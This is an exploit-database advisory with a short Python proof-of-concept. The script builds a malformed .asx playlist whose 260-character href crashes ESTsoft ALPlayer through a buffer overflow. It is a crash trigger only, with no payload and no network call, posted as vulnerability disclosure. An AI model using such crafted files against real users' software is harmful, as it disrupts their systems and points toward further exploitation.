ESTsoft ALPlayer .ASX Playlist crash PoC

2016.09.26
pl zaeek (PL) pl
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: ESTsoft ALPlayer ASX Playlist Buffer Overflow PoC # Date: 26/09/2016 # Exploit Author: zaeek@protonmail.com # Vendor Homepage: http://www.estsoft.com/ # Version: 10.10.29.0 # Tested on: Windows 7 32/64bit ====Description==== ESTsoft ALPlayer doesn't properly handle malformed ASX files, causing application crash. Not tested for code execution, just a quick write-up. ====Proof-of-Concept==== # Simple ESTsoft ALPlayer Buffer Overflow crash PoC # ---- # 1. Generate poc.asx # 2. In ALPlayer > Open Files > Choose poc.asx or drag'n drop the file directly into main window # by zaeek # Thanks to Viotto. start = '<ASX Version = "3.0" >' start += '\n<Entry>' start += '\n<Title>poc</Title>' start += '\n<Ref href ="' + 'A'*260 + '" />' start += '\n</Entry>' start += '\n</ASX>' f = open("poc.asx","w") f.write(start) f.close()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top